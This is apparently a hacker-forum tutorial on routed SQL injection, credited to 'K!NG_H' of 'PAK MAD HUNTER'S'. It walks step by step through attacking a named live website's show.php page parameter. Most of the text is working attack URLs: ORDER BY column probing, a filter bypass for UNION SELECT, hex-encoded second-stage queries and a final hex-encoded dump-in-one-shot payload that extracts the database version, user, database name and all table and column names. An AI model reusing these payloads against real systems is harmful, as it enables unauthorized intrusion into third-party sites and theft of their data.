Sqli for noob explation ty K!NG_H

1. ASSLAM O ALAKIUM
2.  
3. K!NG_H IS HERE From "PAK MAD HUNTER'S"
4.  
5. TOPIC:- ROUTED SQL INJECTON
6.  
7. Today i explain you "zeeshan mughal challenge and also its solution in details hope you enjoy :D
8.  
9. Target:-http://www.onlinepost.in/show.php?page=39
10.  
11. start part are some like other webs in order by case
12.  
13. http://www.onlinepost.in/show.php?page=39 order by 5--
14.  
15. give error means 4 column number
16.  
17. now do union select
18.  
19. http://www.onlinepost.in/show.php?page=.39 union select 1,2,3,4--
20. 403 error i use this for by pass union(Selecct(1),(2).....--+-
21.  
22. http://www.onlinepost.in/show.php?page=.39 union(select(1),(2),(3),(4))--+
23.  
24. no error and page not show vuln column :/
25.  
26. some time we need to route our injection to second query by injecting the first one.
27. So i inject my first query like
28. www.example.com/event.php?id=.2 union select 0x3127,2,3--
29. 0x3127 is hex value of 1'
30. we do some thing with all column number nd watch how many column give error.
31.  
32. So now i do above method
33.  
34. http://www.onlinepost.in/show.php?page=.39 union(select(0x3127),(2),(3),(4))--+
35.  
36. http://www.onlinepost.in/show.php?page=.39 union(select(1),(0x3227),(3),(4))--+
37.  
38. and i was do some thing with all column number
39. and i get error only in 1 column number
40.  
41. now i route second query means i inject my frist query with 1 column number
42.  
43. like etc union(select("' order by 1#"),(2),(3),(4))--+
44. ' order by 1# convert in hex value and than enter
45. http://www.onlinepost.in/show.php?page=.39 union(select(1),(0x3227),(3),(4))--+
46.  
47. http://www.onlinepost.in/show.php?page=.39 union(select(0x27206f72646572206279203123),(2),(3),(4))--+
48. page open normaly no error means our method worked :D
49.  
50. just increase the number in hex value until you will get error
51.  
52. http://www.onlinepost.in/show.php?page=.39 union(select(0x27206f7264657220627920313223),(2),(3),(4))--+
53.  
54. get error on number 12.Means there is 11 number of columns
55.  
56. now union statement in second query :D
57.  
58. http://www.onlinepost.in/show.php?page=.39 union(select(0x2720616e64203020756e696f6e2073656c65637420312c322c332c342c352c362c372c382c392c31302c313123),(2),(3),(4))--+
59.  
60. ' and 0 union select 1,2,3,4,5,6,7,8,9,10,11#
61. i was covert it iin hex value and run
62. query worked :D
63. get vulnerable column "3,5,6,7,9"
64.  
65. now lets use DIOS aand finish the game :D
66.  
67. http://www.onlinepost.in/show.php?page=.39 union(select(0x2720616e64203020756e696f6e2073656c65637420312c322c436f6e636174283078323233653363363237323365336336363666366537343230363336663663366637323364373236353634323037333639376136353364333433653462323134653437356634383363363237323365336336363666366537343230363336663663366637323364363737323635363536653230373336393761363533643334336535363635373237333639366636653361336133613361202c76657273696f6e28292c307833633632373233653535353334353532336133613361202c7573657228292c3078336336323732336534343431353434313432343135333435336133613361202c646174616261736528292c3078336336363666366537343230363336663663366637323364363236633735363532303733363937613635336433343365336334323532336535343431343234633435353333613361336133633432353233652c282f2a21313233343573454c6563542a2f28402966726f6d282f2a21313233343573454c6563542a2f28403a3d30783030292c282f2a21313233343573454c6563542a2f28402966726f6d2860496e466f524d4174694f4e5f734348654d61602e60436f6c554d4e736029776865726528605441626c455f734348656d41603d44617441624173452f2a646174612a2f282929616e64284029696e28403a3d436f4e43617428402c30783363363237323365353436313632366336353230343636663735366536343230336132302c5461424c655f6e414d652c3078336133612c636f6c756d6e5f6e616d65292929296129292c342c352c362c372c382c392c31302c313123),(2),(3),(4))--+
68.  
69. DONE :D
70.  
71. hope you all understand it
72. If i do any mistake .plz forgive me
73. thanx to ZEESHAN MUGHAL for web link :D
74. ALLAH HAFIZ
75.  
76. ./logout